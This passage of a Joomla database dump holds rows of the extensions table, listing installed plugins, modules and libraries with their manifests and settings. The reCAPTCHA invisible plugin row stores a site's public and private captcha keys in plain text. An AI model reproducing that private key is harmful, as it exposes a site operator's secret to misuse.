00:00:00',0,0),(10106,0,'plg_installer_webinstaller','plugin','webinstaller','installer',0,1,1,0,'{\"name\":\"plg_installer_webinstaller\",\"type\":\"plugin\",\"creationDate\":\"28 April 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2013 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.0.1\",\"description\":\"PLG_INSTALLER_WEBINSTALLER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"webinstaller\"}','{\"tab_position\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10107,10154,'plg_quickicon_jce','plugin','jce','quickicon',0,1,1,0,'{\"name\":\"plg_quickicon_jce\",\"type\":\"plugin\",\"creationDate\":\"27-04-2021\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2021 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.9.6\",\"description\":\"PLG_QUICKICON_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10108,0,'plg_quickicon_phpversioncheck','plugin','phpversioncheck','quickicon',0,0,1,0,'{\"name\":\"plg_quickicon_phpversioncheck\",\"type\":\"plugin\",\"creationDate\":\"August 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_QUICKICON_PHPVERSIONCHECK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phpversioncheck\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10109,0,'plg_search_tags','plugin','tags','search',0,0,1,0,'{\"name\":\"plg_search_tags\",\"type\":\"plugin\",\"creationDate\":\"March 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2014 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}','{\"search_limit\":\"50\",\"show_tagged_items\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10110,0,'PLG_EASYFRONTENDSEO','plugin','easyfrontendseo','system',0,0,1,0,'{\"name\":\"PLG_EASYFRONTENDSEO\",\"type\":\"plugin\",\"creationDate\":\"2016-10-30\",\"author\":\"Viktor Vogel\",\"copyright\":\"Copyright 2016 Viktor Vogel. All rights reserved.\",\"authorEmail\":\"admin@kubik-rubik.de\",\"authorUrl\":\"https:\\/\\/joomla-extensions.kubik-rubik.de\\/\",\"version\":\"3.3.1\",\"description\":\"PLG_EASYFRONTENDSEO_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"easyfrontendseo\"}','{\"filter_groups\":\"8\",\"allowed_user_ids\":\"\",\"field_title\":\"1\",\"characters_title\":\"65\",\"icon_title\":\"1\",\"field_description\":\"1\",\"characters_description\":\"160\",\"icon_description\":\"1\",\"field_keywords\":\"1\",\"icon_keywords\":\"1\",\"field_generator\":\"1\",\"icon_generator\":\"1\",\"field_robots\":\"1\",\"icon_robots\":\"1\",\"field_delete\":\"1\",\"global_title\":\"\",\"global_generator\":\"\",\"global_robots\":\"index, follow\",\"custom_metatags\":\"\",\"com_content_enable\":\"0\",\"com_content_description_select_text\":\"0\",\"com_content_description_add_dots\":\"1\",\"com_content_overwrite_description\":\"0\",\"com_content_number_keywords\":\"6\",\"com_content_min_length_keywords\":\"3\",\"com_content_overwrite_keywords\":\"0\",\"com_content_blacklist_keywords\":\"\",\"com_k2_enable\":\"0\",\"com_k2_description_select_text\":\"0\",\"com_k2_description_add_dots\":\"1\",\"com_k2_overwrite_description\":\"0\",\"com_k2_number_keywords\":\"6\",\"com_k2_min_length_keywords\":\"3\",\"com_k2_overwrite_keywords\":\"0\",\"com_k2_blacklist_keywords\":\"\",\"style\":\"1\",\"modal_position\":\"1\",\"word_count\":\"1\",\"save_data_table_content\":\"0\",\"save_data_table_menu\":\"0\",\"overwrite_notice\":\"0\",\"relative_urls\":\"1\",\"compatibility\":\"0\",\"collect_urls\":\"0\",\"exclude_components\":\"\",\"exclude_urls\":\"\",\"update\":\"0\",\"donation_code\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10111,0,'plg_system_fields','plugin','fields','system',0,0,1,0,'{\"name\":\"plg_system_fields\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_SYSTEM_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10112,0,'plg_system_stats','plugin','stats','system',0,0,1,0,'{\"name\":\"plg_system_stats\",\"type\":\"plugin\",\"creationDate\":\"November 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"PLG_SYSTEM_STATS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"stats\"}','{\"interval\":\"12\",\"mode\":\"1\",\"lastrun\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10113,0,'plg_system_updatenotification','plugin','updatenotification','system',0,0,1,0,'{\"name\":\"plg_system_updatenotification\",\"type\":\"plugin\",\"creationDate\":\"May 2015\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2015 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"PLG_SYSTEM_UPDATENOTIFICATION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"updatenotification\"}','{\"email\":\"\",\"language_override\":\"\",\"lastrun\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10114,0,'plg_twofactorauth_totp','plugin','totp','twofactorauth',0,0,1,0,'{\"name\":\"plg_twofactorauth_totp\",\"type\":\"plugin\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_TOTP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"totp\"}','{\"section\":\"3\"}','','',0,'0000-00-00 00:00:00',0,0),(10115,0,'plg_twofactorauth_yubikey','plugin','yubikey','twofactorauth',0,0,1,0,'{\"name\":\"plg_twofactorauth_yubikey\",\"type\":\"plugin\",\"creationDate\":\"September 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_YUBIKEY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"yubikey\"}','{\"section\":\"3\"}','','',0,'0000-00-00 00:00:00',0,0),(10116,0,'Skrill','plugin','skrill','vmpayment',0,0,1,0,'{\"name\":\"Skrill\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"VirtueMart Development Team, Skrill Holdings Limited\",\"copyright\":\"Copyright (C) 2004 - 2020 Virtuemart Team. All rights reserved., Copyright (C) 2019 Skrill.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"<a href=\\\"http:\\/\\/www.skrill.com\\\" target=\\\"_blank\\\">skrill<\\/a> is a popular\\n  payment provider authorised by the Financial Services Authority of the United Kingdom (FCA). \\n    \",\"group\":\"\",\"filename\":\"skrill\"}','{}','','',0,'0000-00-00 00:00:00',7,0),(10117,0,'2Checkout','plugin','tco','vmpayment',0,0,1,0,'{\"name\":\"2Checkout\",\"type\":\"plugin\",\"creationDate\":\"October 2015\",\"author\":\"Craig Christenson\",\"copyright\":\"Copyright (C) 2004-2019 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/www.2checkout.com\",\"version\":\"3.8.6\",\"description\":\"<a href=\\\"https:\\/\\/www.2checkout.com\\/referral?r=virtuemart\\\" target=\\\"_blank\\\">2Checkout<\\/a> is a popular payment provider and available in many countries. \\n    \",\"group\":\"\",\"filename\":\"tco\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(10118,0,'FOF','library','fof','',0,1,1,0,'{\"name\":\"FOF\",\"type\":\"library\",\"creationDate\":\"2015-04-22 13:15:32\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(C)2011-2015 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"2.4.3\",\"description\":\"LIB_FOF_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fof\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10119,0,'LIB_IDNA','library','idna_convert','',0,1,1,0,'{\"name\":\"LIB_IDNA\",\"type\":\"library\",\"creationDate\":\"2004\",\"author\":\"phlyLabs\",\"copyright\":\"2004-2011 phlyLabs Berlin, http:\\/\\/phlylabs.de\",\"authorEmail\":\"phlymail@phlylabs.de\",\"authorUrl\":\"http:\\/\\/phlylabs.de\",\"version\":\"0.8.0\",\"description\":\"LIB_IDNA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"idna_convert\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10120,0,'LIB_PHPASS','library','phpass','',0,1,1,0,'{\"name\":\"LIB_PHPASS\",\"type\":\"library\",\"creationDate\":\"2004-2006\",\"author\":\"Solar Designer\",\"copyright\":\"\",\"authorEmail\":\"solar@openwall.com\",\"authorUrl\":\"http:\\/\\/www.openwall.com\\/phpass\\/\",\"version\":\"0.3\",\"description\":\"LIB_PHPASS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phpass\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(318,0,'mod_sampledata','module','mod_sampledata','',1,1,1,0,'{\"name\":\"mod_sampledata\",\"type\":\"module\",\"creationDate\":\"July 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2017 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8.0\",\"description\":\"MOD_SAMPLEDATA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_sampledata\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(479,0,'plg_sampledata_blog','plugin','blog','sampledata',0,0,1,0,'{\"name\":\"plg_sampledata_blog\",\"type\":\"plugin\",\"creationDate\":\"July 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2017 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8.0\",\"description\":\"PLG_SAMPLEDATA_BLOG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"blog\"}','','','',0,'0000-00-00 00:00:00',0,0),(10122,0,'tcpdf','component','com_tcpdf','',1,1,0,0,'{\"name\":\"tcpdf\",\"type\":\"component\",\"creationDate\":\"February 2015\",\"author\":\"Nicola Asuni, The VirtueMart Development Team\",\"copyright\":\"Copyright (c) 2001-2013 Nicola Asuni - Tecnick.com LTD - Tutti i diritti riservati - All Rights Reserved. 2015 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"${PHING.VM.MAINTAINERURL}\",\"version\":\"1.0.4\",\"description\":\"TCPDF 6.2.12 by Nicola Asuni. Joomla Installer by the VirtueMart Team\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10123,10129,'lib_jdiction','library','lib_jdiction','',0,1,1,0,'{\"name\":\"lib_jdiction\",\"type\":\"library\",\"creationDate\":\"March 2011\",\"author\":\"ITronic Harald Leithner\",\"copyright\":\"(C) 2016 Harald Leithner All rights reserved.\",\"authorEmail\":\"joomla@itronic.at\",\"authorUrl\":\"http:\\/\\/joomla.itronic.at\",\"version\":\"2.0.1\",\"description\":\"LIB_JDICTION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"lib_jdiction\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10124,10129,'System - jDiction multilanguage package','plugin','jdiction','system',0,0,1,0,'{\"name\":\"System - jDiction multilanguage package\",\"type\":\"plugin\",\"creationDate\":\"March 2011\",\"author\":\"ITronic Harald Leithner\",\"copyright\":\"(C) 2016 Harald Leithner All rights reserved.\",\"authorEmail\":\"joomla@itronic.at\",\"authorUrl\":\"joomla.itronic.at\",\"version\":\"2.0.1\",\"description\":\"Provides multilanuage content for joomla.\",\"group\":\"\",\"filename\":\"jdiction\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10125,10129,'plg_finder_jdcontent','plugin','jdcontent','finder',0,0,1,0,'{\"name\":\"plg_finder_jdcontent\",\"type\":\"plugin\",\"creationDate\":\"August 2012\",\"author\":\"ITronic Harald Leithner\",\"copyright\":\"(C) 2016 Harald Leithner All rights reserved.\",\"authorEmail\":\"joomla@itronic.at\",\"authorUrl\":\"www.itronic.at\",\"version\":\"2.0.1\",\"description\":\"Provides Content plugin for finder\",\"group\":\"\",\"filename\":\"jdcontent\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10126,10129,'jdlanguage','module','mod_jdlanguage','',0,1,0,0,'{\"name\":\"jdlanguage\",\"type\":\"module\",\"creationDate\":\"March 2011\",\"author\":\"ITronic Harald Leithner\",\"copyright\":\"(C) 2016 Harald Leithner All rights reserved.\",\"authorEmail\":\"joomla@itronic.at\",\"authorUrl\":\"http:\\/\\/joomla@itronic.at\",\"version\":\"2.0.1\",\"description\":\"MOD_JDLANGUAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_jdlanguage\"}','{\"currentlanguage\":\"1\",\"alternatetag\":\"1\",\"layout_style\":\"text\",\"update_hash\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10127,10129,'com_jdiction','component','com_jdiction','',1,0,0,0,'{\"name\":\"com_jdiction\",\"type\":\"component\",\"creationDate\":\"March 2011\",\"author\":\"ITronic Harald Leithner\",\"copyright\":\"(C) 2012 Harald Leithner All rights reserved.\",\"authorEmail\":\"joomla@itronic.at\",\"authorUrl\":\"http:\\/\\/joomla.itronic.at\",\"version\":\"2.0.1\",\"description\":\"COM_JDICTION_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10128,10129,'jdiction_dbproxy','file','jddbproxy','',0,1,0,0,'{\"name\":\"jdiction_dbproxy\",\"type\":\"file\",\"creationDate\":\"March 2011\",\"author\":\"ITronic Harald Leithner\",\"copyright\":\"(C) 2016 Harald Leithner All rights reserved.\",\"authorEmail\":\"joomla@itronic.at\",\"authorUrl\":\"http:\\/\\/jdiction.org\",\"version\":\"2.0.1\",\"description\":\"JDiction Database Proxy\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10129,0,'jDiction a multilanguage package for Joomla','package','pkg_jdiction','',0,0,1,0,'{\"name\":\"jDiction a multilanguage package for Joomla\",\"type\":\"package\",\"creationDate\":\"March 2011\",\"author\":\"Unknown\",\"copyright\":\"(C) 2016 Harald Leithner All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"2.0.1\",\"description\":\"\\n    <div style=\\\"text-align: center;\\\">\\n      <h2><a title=\\\"jDiction\\\" href=\\\"http:\\/\\/jdiction.org\\/?pk_campaign=Install&pk_kwd=Top\\\" target=\\\"_blank\\\">jDiction<\\/a><\\/h2>\\n      <h3>Version 2.0.1<\\/h3>\\n      <hr \\/>\\n      Thanks for installing jDiction. For configuration instructions please visit the <a href=\\\"http:\\/\\/jdiction.org\\/documentation?pk_campaign=Install&pk_kwd=Documentation\\\" target=\\\"_blank\\\">Documentation Manual<\\/a>\\n      <br \\/>\\n      <hr \\/>\\n      jDiction has a <a href=\\\"index.php?option=com_jdiction&view=check\\\">check page<\\/a> that could help you find some common problems<br>\\n      <\\/br>\\n    <\\/div>\",\"group\":\"\",\"filename\":\"pkg_jdiction\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10131,0,'file_fef','file','file_fef','',0,1,0,0,'{\"name\":\"file_fef\",\"type\":\"file\",\"creationDate\":\"2022-10-24\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"(C) 2017-2021 Akeeba Ltd.\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"2.1.1\",\"description\":\"Akeeba Frontend Framework - The CSS framework for Akeeba Ltd extensions.\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(480,0,'plg_system_sessiongc','plugin','sessiongc','system',0,1,1,0,'{\"name\":\"plg_system_sessiongc\",\"type\":\"plugin\",\"creationDate\":\"February 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8.6\",\"description\":\"PLG_SYSTEM_SESSIONGC_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"sessiongc\"}','','','',0,'0000-00-00 00:00:00',0,0),(35,0,'com_privacy','component','com_privacy','',1,1,1,1,'{\"name\":\"com_privacy\",\"type\":\"component\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"COM_PRIVACY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"privacy\"}','','','',0,'0000-00-00 00:00:00',0,0),(482,0,'plg_content_confirmconsent','plugin','confirmconsent','content',0,0,1,0,'{\"name\":\"plg_content_confirmconsent\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_CONTENT_CONFIRMCONSENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"confirmconsent\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(36,0,'com_actionlogs','component','com_actionlogs','',1,1,1,1,'{\"name\":\"com_actionlogs\",\"type\":\"component\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"COM_ACTIONLOGS_XML_DESCRIPTION\",\"group\":\"\"}','{\"ip_logging\":0,\"csv_delimiter\":\",\",\"loggable_extensions\":[\"com_banners\",\"com_cache\",\"com_categories\",\"com_checkin\",\"com_config\",\"com_contact\",\"com_content\",\"com_installer\",\"com_media\",\"com_menus\",\"com_messages\",\"com_modules\",\"com_newsfeeds\",\"com_plugins\",\"com_redirect\",\"com_tags\",\"com_templates\",\"com_users\"]}','','',0,'0000-00-00 00:00:00',0,0),(483,0,'PLG_SYSTEM_ACTIONLOGS','plugin','actionlogs','system',0,0,1,0,'{\"name\":\"PLG_SYSTEM_ACTIONLOGS\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SYSTEM_ACTIONLOGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"actionlogs\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(484,0,'PLG_ACTIONLOG_JOOMLA','plugin','joomla','actionlog',0,1,1,0,'{\"name\":\"PLG_ACTIONLOG_JOOMLA\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_ACTIONLOG_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(481,0,'plg_fields_repeatable','plugin','repeatable','fields',0,1,1,0,'{\"name\":\"plg_fields_repeatable\",\"type\":\"plugin\",\"creationDate\":\"April 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_FIELDS_REPEATABLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"repeatable\"}','','','',0,'0000-00-00 00:00:00',0,0),(319,0,'mod_latestactions','module','mod_latestactions','',1,1,1,0,'{\"name\":\"mod_latestactions\",\"type\":\"module\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"MOD_LATESTACTIONS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_latestactions\"}','{}','','',0,'1970-01-01 00:00:00',0,0),(485,0,'plg_system_privacyconsent','plugin','privacyconsent','system',0,0,1,0,'{\"name\":\"plg_system_privacyconsent\",\"type\":\"plugin\",\"creationDate\":\"April 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SYSTEM_PRIVACYCONSENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"privacyconsent\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(486,0,'plg_system_logrotation','plugin','logrotation','system',0,1,1,0,'{\"name\":\"plg_system_logrotation\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SYSTEM_LOGROTATION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"logrotation\"}','{\"lastrun\":1780678285}','','',0,'0000-00-00 00:00:00',0,0),(487,0,'plg_privacy_user','plugin','user','privacy',0,1,1,0,'{\"name\":\"plg_privacy_user\",\"type\":\"plugin\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_USER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"user\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(320,0,'mod_privacy_dashboard','module','mod_privacy_dashboard','',1,1,1,0,'{\"name\":\"mod_privacy_dashboard\",\"type\":\"module\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"MOD_PRIVACY_DASHBOARD_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_privacy_dashboard\"}','{}','','',0,'1970-01-01 00:00:00',0,0),(488,0,'plg_quickicon_privacycheck','plugin','privacycheck','quickicon',0,1,1,0,'{\"name\":\"plg_quickicon_privacycheck\",\"type\":\"plugin\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_QUICKICON_PRIVACYCHECK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"privacycheck\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(489,0,'plg_user_terms','plugin','terms','user',0,0,1,0,'{\"name\":\"plg_user_terms\",\"type\":\"plugin\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_USER_TERMS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"terms\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(490,0,'plg_privacy_contact','plugin','contact','privacy',0,1,1,0,'{\"name\":\"plg_privacy_contact\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(491,0,'plg_privacy_content','plugin','content','privacy',0,1,1,0,'{\"name\":\"plg_privacy_content\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(492,0,'plg_privacy_message','plugin','message','privacy',0,1,1,0,'{\"name\":\"plg_privacy_message\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_MESSAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"message\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(493,0,'plg_privacy_actionlogs','plugin','actionlogs','privacy',0,1,1,0,'{\"name\":\"plg_privacy_actionlogs\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_ACTIONLOGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"actionlogs\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(494,0,'plg_captcha_recaptcha_invisible','plugin','recaptcha_invisible','captcha',0,0,1,0,'{\"name\":\"plg_captcha_recaptcha_invisible\",\"type\":\"plugin\",\"creationDate\":\"November 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2017 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8\",\"description\":\"PLG_CAPTCHA_RECAPTCHA_INVISIBLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"recaptcha_invisible\"}','{\"public_key\":\"6LdkH7kUAAAAACcvxJx05f6pqZltYL93nXtM47nz\",\"private_key\":\"6LdkH7kUAAAAALf_9QUYQVekXNUdgGqgqyciew6B\",\"badge\":\"bottomright\",\"tabindex\":0,\"callback\":\"\",\"expired_callback\":\"\",\"error_callback\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(495,0,'plg_privacy_consents','plugin','consents','privacy',0,1,1,0,'{\"name\":\"plg_privacy_consents\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_CONSENTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"consents\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10132,0,'file_fof30','file','file_fof30','',0,1,0,0,'{\"name\":\"file_fof30\",\"type\":\"file\",\"creationDate\":\"2021-02-19\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(c)2010-2021 Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"authorEmail\":\"nicholas@akeeba.com\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"3.7.4\",\"description\":\"\\n\\t\\t\\n\\t\\tFramework-on-Framework (FOF) 3.x - The rapid application development framework for Joomla!.<br\\/>\\n\\t\\t<b>WARNING<\\/b>: This is NOT a duplicate of the FOF library already installed with Joomla!. It is a different version used by other extensions on your site. Do NOT uninstall either FOF package. If you do you will break your site.\\n\\t\\t\\n\\t\",\"group\":\"\"}','','','',0,'0000-00-00 